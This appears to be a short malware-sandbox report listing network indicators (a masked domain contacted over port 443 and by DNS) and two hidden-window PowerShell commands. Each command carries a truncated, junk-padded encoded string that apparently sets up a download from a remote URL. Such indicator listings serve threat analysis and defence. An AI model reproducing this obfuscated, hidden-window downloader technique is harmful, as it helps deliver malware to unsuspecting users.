Technical Information
- 'wa####percave.com':443
- 'wa####percave.com':443
- DNS ASK wa####percave.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JpYmDdBppYmDdG0pYmDdYQBnpYmDdGUpYmDdVQBypYmDdGwpYmDdIpYmDdpYmDd9pYmDdCpYmDdpYmDdJwBopYmDdHQpYmDddpYmDdBwpYmDdHMpYmDdOgpYmDdvpYmDdC8pYmDddwBhpYmDdGwpYmDdbpYmDdBwpYmDdGEpYmDd...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'JpYmDdBppYmDdG0pYmDdYQBnpYmDdGUpYmDdVQBypYmDdGwpYmDdIpYmDdpYmDd9pYmDdCpYmDdpYmDdJwBopYmDdHQpYmDddpYmDdBwpYmDdHMpYmDdOgpYmDdvpYmDdC8pYmDddwBhpYmDdGwpYmDdbpYmDdBwpYmDdGEpYmDd...